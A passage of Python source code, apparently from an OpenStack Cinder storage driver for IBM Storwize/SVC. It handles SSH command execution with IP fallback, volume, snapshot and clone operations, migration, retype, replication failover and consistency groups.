raise exception.InvalidInput(
reason=_('The storage device does not support %(prot)s. '
'Please configure the device to support %(prot)s or '
'switch to a driver using a different protocol.')
% {'prot': self.protocol})
required_flags = ['san_ip', 'san_ssh_port', 'san_login',
'storwize_svc_volpool_name']
for flag in required_flags:
if not self.configuration.safe_get(flag):
raise exception.InvalidInput(reason=_('%s is not set.') % flag)
# Ensure that either password or keyfile were set
if not (self.configuration.san_password or
self.configuration.san_private_key):
raise exception.InvalidInput(
reason=_('Password or SSH private key is required for '
'authentication: set either san_password or '
'san_private_key option.'))
opts = self._helpers.build_default_opts(self.configuration)
self._helpers.check_vdisk_opts(self._state, opts)
LOG.debug('leave: check_for_setup_error')
def _run_ssh(self, cmd_list, check_exit_code=True, attempts=1):
cinder_utils.check_ssh_injection(cmd_list)
command = ' '.join(cmd_list)
if not self.sshpool:
try:
self.sshpool = self._set_up_sshpool(self.configuration.san_ip)
except paramiko.SSHException:
LOG.warning(_LW('Unable to use san_ip to create SSHPool. Now '
'attempting to use storwize_san_secondary_ip '
'to create SSHPool.'))
if self.configuration.storwize_san_secondary_ip is not None:
self.sshpool = self._set_up_sshpool(
self.configuration.storwize_san_secondary_ip)
else:
LOG.warning(_LW('Unable to create SSHPool using san_ip '
'and not able to use '
'storwize_san_secondary_ip since it is '
'not configured.'))
raise
try:
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
except Exception:
# Need to check if creating an SSHPool storwize_san_secondary_ip
# before raising an error.
if self.configuration.storwize_san_secondary_ip is not None:
if (self.sshpool.ip ==
self.configuration.storwize_san_secondary_ip):
LOG.warning(_LW("Unable to execute SSH command with "
"storwize_san_secondary_ip. "
"Attempting to switch IP back "
"to san_ip %s."),
self.configuration.san_ip)
self.sshpool = self._set_up_sshpool(
self.configuration.san_ip)
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
else:
LOG.warning(_LW("Unable to execute SSH command. "
"Attempting to switch IP to %s."),
self.configuration.storwize_san_secondary_ip)
self.sshpool = self._set_up_sshpool(
self.configuration.storwize_san_secondary_ip)
return self._ssh_execute(self.sshpool, command,
check_exit_code, attempts)
else:
LOG.warning(_LW('Unable to execute SSH command. '
'Not able to use '
'storwize_san_secondary_ip since it is '
'not configured.'))
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"),
command)
def _set_up_sshpool(self, ip):
password = self.configuration.san_password
privatekey = self.configuration.san_private_key
min_size = self.configuration.ssh_min_pool_conn
max_size = self.configuration.ssh_max_pool_conn
sshpool = ssh_utils.SSHPool(
ip,
self.configuration.san_ssh_port,
self.configuration.ssh_conn_timeout,
self.configuration.san_login,
password=password,
privatekey=privatekey,
min_size=min_size,
max_size=max_size)
return sshpool
def _ssh_execute(self, sshpool, command,
check_exit_code = True, attempts=1):
try:
with sshpool.item() as ssh:
while attempts > 0:
attempts -= 1
try:
return processutils.ssh_execute(
ssh,
command,
check_exit_code=check_exit_code)
except Exception as e:
LOG.error(_LE('Error has occurred: %s'), e)
last_exception = e
greenthread.sleep(random.randint(20, 500) / 100.0)
try:
raise processutils.ProcessExecutionError(
exit_code=last_exception.exit_code,
stdout=last_exception.stdout,
stderr=last_exception.stderr,
cmd=last_exception.cmd)
except AttributeError:
raise processutils.ProcessExecutionError(
exit_code=-1,
stdout="",
stderr="Error running SSH command",
cmd=command)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Error running SSH command: %s"), command)
def ensure_export(self, ctxt, volume):
"""Check that the volume exists on the storage.
The system does not "export" volumes as a Linux iSCSI target does,
and therefore we just check that the volume exists on the storage.
"""
volume_defined = self._helpers.is_vdisk_defined(volume['name'])
if not volume_defined:
LOG.error(_LE('ensure_export: Volume %s not found on storage.'),
volume['name'])
def create_export(self, ctxt, volume, connector):
model_update = None
return model_update
def remove_export(self, ctxt, volume):
pass
def _get_vdisk_params(self, type_id, volume_type=None,
volume_metadata=None):
return self._helpers.get_vdisk_params(self.configuration,
self._state, type_id,
volume_type=volume_type,
volume_metadata=volume_metadata)
def create_volume(self, volume):
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_vdisk(volume['name'], str(volume['size']),
'gb', pool, opts)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
model_update = None
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
model_update = {'replication_status': 'enabled'}
elif opts.get('replication'):
model_update = self.replication.create_replica(ctxt, volume)
return model_update
def delete_volume(self, volume):
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).delete_target_volume(
volume)
self._helpers.delete_vdisk(volume['name'], False)
if volume['id'] in self._vdiskcopyops:
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
def create_snapshot(self, snapshot):
ctxt = context.get_admin_context()
try:
source_vol = self.db.volume_get(ctxt, snapshot['volume_id'])
except Exception:
msg = (_('create_snapshot: get source volume failed.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
pool = utils.extract_host(source_vol['host'], 'pool')
opts = self._get_vdisk_params(source_vol['volume_type_id'])
self._helpers.create_copy(snapshot['volume_name'], snapshot['name'],
snapshot['volume_id'], self.configuration,
opts, False, pool=pool)
def delete_snapshot(self, snapshot):
self._helpers.delete_vdisk(snapshot['name'], False)
def create_volume_from_snapshot(self, volume, snapshot):
if volume['size'] != snapshot['volume_size']:
msg = (_('create_volume_from_snapshot: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
pool = utils.extract_host(volume['host'], 'pool')
self._helpers.create_copy(snapshot['name'], volume['name'],
snapshot['id'], self.configuration,
opts, True, pool=pool)
if opts['qos']:
self._helpers.add_vdisk_qos(volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(ctxt,
volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, volume)
if replica_status:
return replica_status
def create_cloned_volume(self, tgt_volume, src_volume):
"""Creates a clone of the specified volume."""
if src_volume['size'] > tgt_volume['size']:
msg = (_("create_cloned_volume: source volume %(src_vol)s "
"size is %(src_size)dGB and doesn't fit in target "
"volume %(tgt_vol)s of size %(tgt_size)dGB.") %
{'src_vol': src_volume['name'],
'src_size': src_volume['size'],
'tgt_vol': tgt_volume['name'],
'tgt_size': tgt_volume['size']})
LOG.error(msg)
raise exception.InvalidInput(message=msg)
opts = self._get_vdisk_params(tgt_volume['volume_type_id'],
volume_metadata=
tgt_volume.get('volume_metadata'))
pool = utils.extract_host(tgt_volume['host'], 'pool')
self._helpers.create_copy(src_volume['name'], tgt_volume['name'],
src_volume['id'], self.configuration,
opts, True, pool=pool)
# The source volume size is equal to target volume size
# in most of the cases. But in some scenario, the target
# volume size may be bigger than the source volume size.
# SVC does not support flashcopy between two volumes
# with two different size. So use source volume size to
# create target volume first and then extend target
# volume to orginal size.
if tgt_volume['size'] > src_volume['size']:
# extend the new created target volume to expected size.
self._extend_volume_op(tgt_volume, tgt_volume['size'],
src_volume['size'])
if opts['qos']:
self._helpers.add_vdisk_qos(tgt_volume['name'], opts['qos'])
ctxt = context.get_admin_context()
rep_type = self._get_volume_replicated_type(ctxt, tgt_volume)
# The replication V2 has a higher priority than the replication V1.
# Check if V2 is available first, then check if V1 is available.
if rep_type and self._replication_enabled:
self.replications.get(rep_type).volume_replication_setup(
ctxt, tgt_volume)
return {'replication_status': 'enabled'}
elif opts.get('replication'):
replica_status = self.replication.create_replica(ctxt, tgt_volume)
if replica_status:
return replica_status
def extend_volume(self, volume, new_size):
self._extend_volume_op(volume, new_size)
def _extend_volume_op(self, volume, new_size, old_size=None):
LOG.debug('enter: _extend_volume_op: volume %s', volume['id'])
ret = self._helpers.ensure_vdisk_no_fc_mappings(volume['name'],
allow_snaps=False)
if not ret:
msg = (_('_extend_volume_op: Extending a volume with snapshots is '
'not supported.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if old_size is None:
old_size = volume['size']
extend_amt = int(new_size) - old_size
ctxt = context.get_admin_context()
rep_mirror_type = self._get_volume_replicated_type_mirror(ctxt,
volume)
rep_status = volume.get("replication_status", None)
target_vol_name = None
if rep_mirror_type and rep_status != "failed-over":
try:
rel_info = self._helpers.get_relationship_info(volume)
self._helpers.delete_relationship(volume)
except Exception as e:
msg = (_('Failed to get remote copy information for '
'%(volume)s. Exception: %(err)s.'), {'volume':
volume['id'],
'err': e})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if rel_info:
target_vol_name = rel_info.get('aux_vdisk_name')
self.replications.get(rep_mirror_type).extend_target_volume(
target_vol_name, extend_amt)
self._helpers.extend_vdisk(volume['name'], extend_amt)
if rep_mirror_type and rep_status != "failed-over":
self.replications.get(rep_mirror_type).create_relationship(
volume, target_vol_name)
LOG.debug('leave: _extend_volume_op: volume %s', volume['id'])
def add_vdisk_copy(self, volume, dest_pool, vol_type):
return self._helpers.add_vdisk_copy(volume, dest_pool,
vol_type, self._state,
self.configuration)
def _add_vdisk_copy_op(self, ctxt, volume, new_op):
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
new_ops_list = curr_ops_list.append(new_op)
else:
new_ops_list = [new_op]
new_ops_str = ';'.join([':'.join(x) for x in new_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
if volume['id'] in self._vdiskcopyops:
self._vdiskcopyops[volume['id']].append(new_op)
else:
self._vdiskcopyops[volume['id']] = [new_op]
# We added the first copy operation, so start the looping call
if len(self._vdiskcopyops) == 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
def _rm_vdisk_copy_op(self, ctxt, volume, orig_copy_id, new_copy_id):
try:
self._vdiskcopyops[volume['id']].remove((orig_copy_id,
new_copy_id))
if not len(self._vdiskcopyops[volume['id']]):
del self._vdiskcopyops[volume['id']]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
except KeyError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %s does not have any '
'registered vdisk copy operations.'), volume['id'])
return
except ValueError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s does not have '
'the specified vdisk copy operation: orig=%(orig)s '
'new=%(new)s.'),
{'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
return
metadata = self.db.volume_admin_metadata_get(ctxt.elevated(),
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if not curr_ops:
LOG.error(_LE('_rm_vdisk_copy_op: Volume metadata %s does not '
'have any registered vdisk copy operations.'),
volume['id'])
return
curr_ops_list = [tuple(x.split(':')) for x in curr_ops.split(';')]
try:
curr_ops_list.remove((orig_copy_id, new_copy_id))
except ValueError:
LOG.error(_LE('_rm_vdisk_copy_op: Volume %(vol)s metadata does '
'not have the specified vdisk copy operation: '
'orig=%(orig)s new=%(new)s.'),
{'vol': volume['id'], 'orig': orig_copy_id,
'new': new_copy_id})
return
if len(curr_ops_list):
new_ops_str = ';'.join([':'.join(x) for x in curr_ops_list])
self.db.volume_admin_metadata_update(ctxt.elevated(), volume['id'],
{'vdiskcopyops': new_ops_str},
False)
else:
self.db.volume_admin_metadata_delete(ctxt.elevated(), volume['id'],
'vdiskcopyops')
def promote_replica(self, ctxt, volume):
return self.replication.promote_replica(volume)
def reenable_replication(self, ctxt, volume):
return self.replication.reenable_replication(volume)
def create_replica_test_volume(self, tgt_volume, src_volume):
if src_volume['size'] != tgt_volume['size']:
msg = (_('create_cloned_volume: Source and destination '
'size differ.'))
LOG.error(msg)
raise exception.InvalidInput(message=msg)
replica_status = self.replication.test_replica(tgt_volume,
src_volume)
return replica_status
def get_replication_status(self, ctxt, volume):
replica_status = None
if self.replication:
replica_status = self.replication.get_replication_status(volume)
return replica_status
def _check_volume_copy_ops(self):
LOG.debug("Enter: update volume copy status.")
ctxt = context.get_admin_context()
copy_items = list(self._vdiskcopyops.items())
for vol_id, copy_ops in copy_items:
try:
volume = self.db.volume_get(ctxt, vol_id)
except Exception:
LOG.warning(_LW('Volume %s does not exist.'), vol_id)
del self._vdiskcopyops[vol_id]
if not len(self._vdiskcopyops):
self._vdiskcopyops_loop.stop()
self._vdiskcopyops_loop = None
continue
for copy_op in copy_ops:
try:
synced = self._helpers.is_vdisk_copy_synced(volume['name'],
copy_op[1])
except Exception:
LOG.info(_LI('_check_volume_copy_ops: Volume %(vol)s does '
'not have the specified vdisk copy '
'operation: orig=%(orig)s new=%(new)s.'),
{'vol': volume['id'], 'orig': copy_op[0],
'new': copy_op[1]})
else:
if synced:
self._helpers.rm_vdisk_copy(volume['name'], copy_op[0])
self._rm_vdisk_copy_op(ctxt, volume, copy_op[0],
copy_op[1])
LOG.debug("Exit: update volume copy status.")
# #### V2.1 replication methods #### #
def failover_host(self, context, volumes, secondary_id=None):
"""Force failover to a secondary replication target."""
self._validate_replication_enabled()
if self.FAILBACK_VALUE == secondary_id:
# In this case the administrator would like to fail back.
volume_update_list = self._replication_failback(context,
volumes)
return None, volume_update_list
# In this case the administrator would like to fail over.
failover_target = None
for target in self._replication_targets:
if target['backend_id'] == secondary_id:
failover_target = target
break
if not failover_target:
msg = _("A valid secondary target MUST be specified in order "
"to failover.")
LOG.error(msg)
raise exception.InvalidReplicationTarget(reason=msg)
target_id = failover_target['backend_id']
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(context, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication.target.get('backend_id') == target_id:
# Check if the target backend matches the replication type.
# If so, fail over the volume.
try:
replication.failover_volume_host(context,
volume, target_id)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'failed-over'}})
except exception.VolumeDriverException:
msg = (_LE('Unable to failover to the secondary. '
'Please make sure that the secondary '
'back-end is ready.'))
LOG.error(msg)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'error'}})
else:
# If the volume is not of replicated type, we need to
# force the status into error state so a user knows they
# do not have access to the volume.
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'error'}})
return target_id, volume_update_list
def _is_host_ready_for_failback(self, ctxt, volumes):
valid_sync_status = ('consistent_synchronized', 'consistent_stopped',
'synchronized', 'idling')
# Check the status of each volume to see if it is in
# a consistent status.
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
if replication:
status = replication.get_relationship_status(volume)
# We need to make sure of that all the volumes are
# in the valid status to trigger a successful
# fail-back. False will be be returned even if only
# one volume is not ready.
if status not in valid_sync_status:
return False
else:
return False
else:
return False
return True
def _replication_failback(self, ctxt, volumes):
"""Fail back all the volume on the secondary backend."""
if not self._is_host_ready_for_failback(ctxt, volumes):
msg = _("The host is not ready to be failed back. Please "
"resynchronize the volumes and resume replication on the "
"Storwize backends.")
LOG.error(msg)
raise exception.VolumeDriverException(data=msg)
volume_update_list = []
for volume in volumes:
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type:
replication = self.replications.get(rep_type)
replication.replication_failback(volume)
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'replication_status': 'enabled'}})
else:
volume_update_list.append(
{'volume_id': volume['id'],
'updates': {'status': 'available'}})
return volume_update_list
def _validate_replication_enabled(self):
if not self._replication_enabled:
msg = _("Issuing a fail-over failed because replication is "
"not properly configured.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def _validate_volume_rep_type(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if not rep_type:
msg = (_("Volume %s is not of replicated type. "
"This volume needs to be of a volume type "
"with the extra spec replication_enabled set "
"to '<is> True' to support replication "
"actions."), volume['id'])
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not self._replication_enabled:
msg = _("The back-end where the volume is created "
"does not have replication enabled.")
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return rep_type
def _get_volume_replicated_type_mirror(self, ctxt, volume):
rep_type = self._get_volume_replicated_type(ctxt, volume)
if rep_type in self.VALID_REP_TYPES:
return rep_type
else:
return None
def _get_specs_replicated_type(self, volume_type):
replication_type = None
extra_specs = volume_type.get("extra_specs", {})
rep_val = extra_specs.get('replication_enabled')
if rep_val == "<is> True":
replication_type = extra_specs.get('replication_type',
self.GLOBAL)
# The format for replication_type in extra spec is in
# "<in> global". Otherwise, the code will
# not reach here.
if replication_type != self.GLOBAL:
# Pick up the replication type specified in the
# extra spec from the format like "<in> global".
replication_type = replication_type.split()[1]
if replication_type not in self.VALID_REP_TYPES:
replication_type = None
return replication_type
def _get_volume_replicated_type(self, ctxt, volume):
replication_type = None
if volume.get("volume_type_id"):
volume_type = volume_types.get_volume_type(
ctxt, volume["volume_type_id"])
replication_type = self._get_specs_replicated_type(volume_type)
return replication_type
def _do_replication_setup(self):
replication_devices = self.configuration.replication_device
if replication_devices:
replication_targets = []
for dev in replication_devices:
remote_array = {}
remote_array['managed_backend_name'] = (
dev.get('managed_backend_name'))
if not remote_array['managed_backend_name']:
raise exception.InvalidConfigurationValue(
option='managed_backend_name',
value=remote_array['managed_backend_name'])
rep_mode = dev.get('replication_mode')
remote_array['replication_mode'] = rep_mode
remote_array['san_ip'] = (
dev.get('san_ip'))
remote_array['backend_id'] = (
dev.get('backend_id'))
remote_array['san_login'] = (
dev.get('san_login'))
remote_array['san_password'] = (
dev.get('san_password'))
remote_array['pool_name'] = (
dev.get('pool_name'))
replication_targets.append(remote_array)
# Each replication type will have a coresponding replication.
self.create_replication_types(replication_targets)
if len(self._supported_replication_types) > 0:
self._replication_enabled = True
def create_replication_types(self, replication_targets):
for target in replication_targets:
rep_type = target['replication_mode']
if (rep_type in self.VALID_REP_TYPES
and rep_type not in self.replications.keys()):
replication = self.replication_factory(rep_type, target)
try:
replication.establish_target_partnership()
except exception.VolumeDriverException:
msg = (_LE('The replication mode of %(type)s has not '
'successfully established partnership '
'with the replica Storwize target %(stor)s.'),
{'type': rep_type,
'stor': target['backend_id']})
LOG.error(msg)
continue
self.replications[rep_type] = replication
self._replication_targets.append(target)
self._supported_replication_types.append(rep_type)
def replication_factory(self, replication_type, rep_target):
"""Use replication methods for the requested mode."""
if replication_type == self.GLOBAL:
return storwize_rep.StorwizeSVCReplicationGlobalMirror(
self, rep_target, StorwizeHelpers)
if replication_type == self.METRO:
return storwize_rep.StorwizeSVCReplicationMetroMirror(
self, rep_target, StorwizeHelpers)
def migrate_volume(self, ctxt, volume, host):
"""Migrate directly if source and dest are managed by same storage.
We create a new vdisk copy in the desired pool, and add the original
vdisk copy to the admin_metadata of the volume to be deleted. The
deletion will occur using a periodic task once the new copy is synced.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
LOG.debug('enter: migrate_volume: id=%(id)s, host=%(host)s',
{'id': volume['id'], 'host': host['host']})
false_ret = (False, None)
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return false_ret
ctxt = context.get_admin_context()
volume_type_id = volume['volume_type_id']
if volume_type_id is not None:
vol_type = volume_types.get_volume_type(ctxt, volume_type_id)
else:
vol_type = None
self._check_volume_copy_ops()
new_op = self.add_vdisk_copy(volume['name'], dest_pool, vol_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
LOG.debug('leave: migrate_volume: id=%(id)s, host=%(host)s',
{'id': volume['id'], 'host': host['host']})
return (True, None)
def retype(self, ctxt, volume, new_type, diff, host):
"""Convert the volume to be of the new type.
Returns a boolean indicating whether the retype occurred.
:param ctxt: Context
:param volume: A dictionary describing the volume to migrate
:param new_type: A dictionary describing the volume type to convert to
:param diff: A dictionary with the difference between the two types
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
"""
def retype_iogrp_property(volume, new, old):
if new != old:
self._helpers.change_vdisk_iogrp(volume['name'],
self._state, (new, old))
LOG.debug('enter: retype: id=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host})
no_copy_keys = ['warning', 'autoexpand', 'easytier']
copy_keys = ['rsize', 'grainsize', 'compression']
all_keys = no_copy_keys + copy_keys
old_opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_matadata'))
new_opts = self._get_vdisk_params(new_type['id'],
volume_type=new_type)
# Check if retype affects volume replication
model_update = None
old_type_replication = old_opts.get('replication', False)
new_type_replication = new_opts.get('replication', False)
# Delete replica if needed
if old_type_replication and not new_type_replication:
self.replication.delete_replica(volume)
model_update = {'replication_status': 'disabled',
'replication_driver_data': None,
'replication_extended_status': None}
vdisk_changes = []
need_copy = False
for key in all_keys:
if old_opts[key] != new_opts[key]:
if key in copy_keys:
need_copy = True
break
elif key in no_copy_keys:
vdisk_changes.append(key)
if (utils.extract_host(volume['host'], 'pool') !=
utils.extract_host(host['host'], 'pool')):
need_copy = True
if need_copy:
self._check_volume_copy_ops()
dest_pool = self._helpers.can_migrate_to_host(host, self._state)
if dest_pool is None:
return False
# If volume is replicated, can't copy
if new_type_replication:
msg = (_('Unable to retype: Current action needs volume-copy,'
' it is not allowed when new type is replication.'
' Volume = %s'), volume['id'])
raise exception.VolumeDriverException(message=msg)
retype_iogrp_property(volume,
new_opts['iogrp'],
old_opts['iogrp'])
try:
new_op = self.add_vdisk_copy(volume['name'],
dest_pool,
new_type)
self._add_vdisk_copy_op(ctxt, volume, new_op)
except exception.VolumeDriverException:
# roll back changing iogrp property
retype_iogrp_property(volume, old_opts['iogrp'],
new_opts['iogrp'])
msg = (_('Unable to retype: A copy of volume %s exists. '
'Retyping would exceed the limit of 2 copies.'),
volume['id'])
raise exception.VolumeDriverException(message=msg)
else:
retype_iogrp_property(volume, new_opts['iogrp'], old_opts['iogrp'])
self._helpers.change_vdisk_options(volume['name'], vdisk_changes,
new_opts, self._state)
if new_opts['qos']:
# Add the new QoS setting to the volume. If the volume has an
# old QoS setting, it will be overwritten.
self._helpers.update_vdisk_qos(volume['name'], new_opts['qos'])
elif old_opts['qos']:
# If the old_opts contain QoS keys, disable them.
self._helpers.disable_vdisk_qos(volume['name'], old_opts['qos'])
# Add replica if needed
if not old_type_replication and new_type_replication:
model_update = self.replication.create_replica(ctxt, volume,
new_type)
LOG.debug('exit: retype: ild=%(id)s, new_type=%(new_type)s,'
'diff=%(diff)s, host=%(host)s', {'id': volume['id'],
'new_type': new_type,
'diff': diff,
'host': host['host']})
return True, model_update
def update_migrated_volume(self, ctxt, volume, new_volume,
original_volume_status):
"""Return model update from Storwize for migrated volume.
This method should rename the back-end volume name(id) on the
destination host back to its original name(id) on the source host.
:param ctxt: The context used to run the method update_migrated_volume
:param volume: The original volume that was migrated to this backend
:param new_volume: The migration volume object that was created on
this backend as part of the migration process
:param original_volume_status: The status of the original volume
:returns: model_update to update DB with any needed changes
"""
current_name = CONF.volume_name_template % new_volume['id']
original_volume_name = CONF.volume_name_template % volume['id']
try:
self._helpers.rename_vdisk(current_name, original_volume_name)
except exception.VolumeBackendAPIException:
LOG.error(_LE('Unable to rename the logical volume '
'for volume: %s'), volume['id'])
return {'_name_id': new_volume['_name_id'] or new_volume['id']}
# If the back-end name(id) for the volume has been renamed,
# it is OK for the volume to keep the original name(id) and there is
# no need to use the column "_name_id" to establish the mapping
# relationship between the volume id and the back-end volume
# name(id).
# Set the key "_name_id" to None for a successful rename.
model_update = {'_name_id': None}
return model_update
def manage_existing(self, volume, ref):
"""Manages an existing vdisk.
Renames the vdisk to match the expected name for the volume.
Error checking done by manage_existing_get_size is not repeated -
if we got here then we have a vdisk that isn't in use (or we don't
care if it is in use.
"""
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
vdisk_io_grp = self._helpers.get_volume_io_group(vdisk['name'])
if vdisk_io_grp not in self._state['available_iogrps']:
msg = (_("Failed to manage existing volume due to "
"the volume to be managed is not in a valid "
"I/O group."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if volume['volume_type_id']:
opts = self._get_vdisk_params(volume['volume_type_id'],
volume_metadata=
volume.get('volume_metadata'))
vdisk_copy = self._helpers.get_vdisk_copy_attrs(vdisk['name'], '0')
if vdisk_copy['autoexpand'] == 'on' and opts['rsize'] == -1:
msg = (_("Failed to manage existing volume due to "
"the volume to be managed is thin, but "
"the volume type chosen is thick."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if not vdisk_copy['autoexpand'] and opts['rsize'] != -1:
msg = (_("Failed to manage existing volume due to "
"the volume to be managed is thick, but "
"the volume type chosen is thin."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if (vdisk_copy['compressed_copy'] == 'no' and
opts['compression']):
msg = (_("Failed to manage existing volume due to the "
"volume to be managed is not compress, but "
"the volume type chosen is compress."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if (vdisk_copy['compressed_copy'] == 'yes' and
not opts['compression']):
msg = (_("Failed to manage existing volume due to the "
"volume to be managed is compress, but "
"the volume type chosen is not compress."))
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
if vdisk_io_grp != opts['iogrp']:
msg = (_("Failed to manage existing volume due to "
"I/O group mismatch. The I/O group of the "
"volume to be managed is %(vdisk_iogrp)s. I/O group"
"of the chosen type is %(opt_iogrp)s.") %
{'vdisk_iogrp': vdisk['IO_group_name'],
'opt_iogrp': opts['iogrp']})
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
pool = utils.extract_host(volume['host'], 'pool')
if vdisk['mdisk_grp_name'] != pool:
msg = (_("Failed to manage existing volume due to the "
"pool of the volume to be managed does not "
"match the backend pool. Pool of the "
"volume to be managed is %(vdisk_pool)s. Pool "
"of the backend is %(backend_pool)s.") %
{'vdisk_pool': vdisk['mdisk_grp_name'],
'backend_pool':
self.configuration.storwize_svc_volpool_name})
raise exception.ManageExistingVolumeTypeMismatch(reason=msg)
self._helpers.rename_vdisk(vdisk['name'], volume['name'])
def manage_existing_get_size(self, volume, ref):
"""Return size of an existing Vdisk for manage_existing.
existing_ref is a dictionary of the form:
{'source-id': <uid of disk>} or
{'source-name': <name of the disk>}
Optional elements are:
'manage_if_in_use': True/False (default is False)
If set to True, a volume will be managed even if it is currently
attached to a host system.
"""
# Check that the reference is valid
vdisk = self._manage_input_check(ref)
# Check if the disk is in use, if we need to.
manage_if_in_use = ref.get('manage_if_in_use', False)
if (not manage_if_in_use and
self._helpers.is_vdisk_in_use(vdisk['name'])):
reason = _('The specified vdisk is mapped to a host.')
raise exception.ManageExistingInvalidReference(existing_ref=ref,
reason=reason)
return int(math.ceil(float(vdisk['capacity']) / units.Gi))
def unmanage(self, volume):
"""Remove the specified volume from Cinder management."""
pass
def get_volume_stats(self, refresh=False):
"""Get volume stats.
If we haven't gotten stats yet or 'refresh' is True,
run update the stats first.
"""
if not self._stats or refresh:
self._update_volume_stats()
return self._stats
def create_consistencygroup(self, context, group):
"""Create a consistency group.
IBM Storwize will create CG until cg-snapshot creation,
db will maintain the volumes and CG relationship.
"""
LOG.debug("Creating consistency group.")
model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
return model_update
def delete_consistencygroup(self, context, group, volumes):
"""Deletes a consistency group.
IBM Storwize will delete the volumes of the CG.
"""
LOG.debug("Deleting consistency group.")
model_update = {}
model_update['status'] = fields.ConsistencyGroupStatus.DELETED
volumes = self.db.volume_get_all_by_group(context, group['id'])
for volume in volumes:
try:
self._helpers.delete_vdisk(volume['name'], True)
volume['status'] = 'deleted'
except exception.VolumeBackendAPIException as err:
volume['status'] = 'error_deleting'
if model_update['status'] != 'error_deleting':
model_update['status'] = 'error_deleting'
LOG.error(_LE("Failed to delete the volume %(vol)s of CG. "
"Exception: %(exception)s."),
{'vol': volume['name'], 'exception': err})
return model_update, volumes
def update_consistencygroup(self, ctxt, group, add_volumes,
remove_volumes):
"""Adds or removes volume(s) to/from an existing consistency group."""
LOG.debug("Updating consistency group.")
return None, None, None
def create_consistencygroup_from_src(self, context, group, volumes,
cgsnapshot=None, snapshots=None,
source_cg=None, source_vols=None):
"""Creates a consistencygroup from source.
:param context: the context of the caller.
:param group: the dictionary of the consistency group to be created.
:param volumes: a list of volume dictionaries in the group.
:param cgsnapshot: the dictionary of the cgsnapshot as source.
:param snapshots: a list of snapshot dictionaries in the cgsnapshot.
:param source_cg: the dictionary of a consistency group as source.
:param source_vols: a list of volume dictionaries in the source_cg.
:return model_update, volumes_model_update
"""
LOG.debug('Enter: create_consistencygroup_from_src.')
if cgsnapshot and snapshots:
cg_name = 'cg-' + cgsnapshot.id
sources = snapshots
